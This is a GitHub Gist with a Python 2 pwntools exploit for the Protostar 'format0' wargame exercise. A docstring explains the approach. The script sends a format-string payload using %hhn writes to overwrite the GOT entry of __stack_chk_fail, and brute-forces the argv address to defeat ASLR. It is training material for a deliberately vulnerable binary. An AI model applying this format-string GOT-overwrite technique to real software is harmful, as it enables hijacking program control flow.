Created
November 18, 2017 13:12
-
-
Save wbowling/fb103329997debca34ff92b97440c87b to your computer and use it in GitHub Desktop.
https://exploit-exercises.com/protostar/format0/ with modern gcc and aslr https://asciinema.org/a/148133
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| """ | |
| Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead. | |
| The address can be passed in via argv, we cant use nulls but we can use blank strings instead. | |
| As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit | |
| """ | |
| from pwn import * | |
| context.log_level = "warn" | |
| payload = "a"*6 + "%262$hhn" + "a"*(0x1a-6) + "%263$hhn" | |
| payload = payload.ljust(90, "a") | |
| def exploit(): | |
| line = p.recvline() | |
| if "correctly" in line: | |
| print line | |
| exit() | |
| if __name__ == "__main__": | |
| name = "./format0" | |
| i = 0 | |
| while True: | |
| i += 1 | |
| print i | |
| try: | |
| p = process([name, payload, p64(0x601021)[:3], "", "", "", "", p64(0x601020)[:3], "", "", "", "", "", "a"*4], env={}) | |
| exploit() | |
| except Exception as e: | |
| p.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment